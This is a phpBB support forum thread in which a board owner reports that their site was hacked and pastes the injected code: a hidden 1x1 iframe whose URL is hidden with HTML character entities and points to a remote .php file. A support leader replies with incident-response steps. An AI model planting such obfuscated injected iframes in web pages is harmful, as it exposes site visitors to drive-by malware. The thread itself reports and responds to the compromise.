Hacked!

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Scam Warning
Forum rules
END OF SUPPORT: 1 January 2017 (announcement)
Locked
User avatar
DBM
Registered User
Posts: 159
Joined: Tue Oct 25, 2005 10:29 pm
Contact:

Hacked!

Post by DBM »

I had only gone out for half an hour and in that time my forum was hacked. I'm not sure exactly how they did it yet, but it seems that many forum pages were edited (presumably by some bot of some kind) and had code like this added to each page:

Code: Select all

<?php echo '<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>'; ?>
I'm restoring my backups as of now. At this stage I haven't a clue whether the board itself was hacked or if they somehow managed to obtain the FTP password (database looks OK at the moment).

Is there someone on the phpBB security team I can contact?

Thanks.

User avatar
Noxwizard
Support Team Leader
Support Team Leader
Posts: 10361
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster
Contact:

Re: Hacked!

Post by Noxwizard »

If the code has been added to every page, then it sounds more like a server vulnerability than one in phpBB. Having said that, please do the following:
My board has been hacked, what do I do? wrote:Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
[Support Template] - [Read Before Posting] - [phpBB Knowledge Base]
Do not contact me for private support, please share the question in our forums.

Locked

Return to “[3.0.x] Support Forum”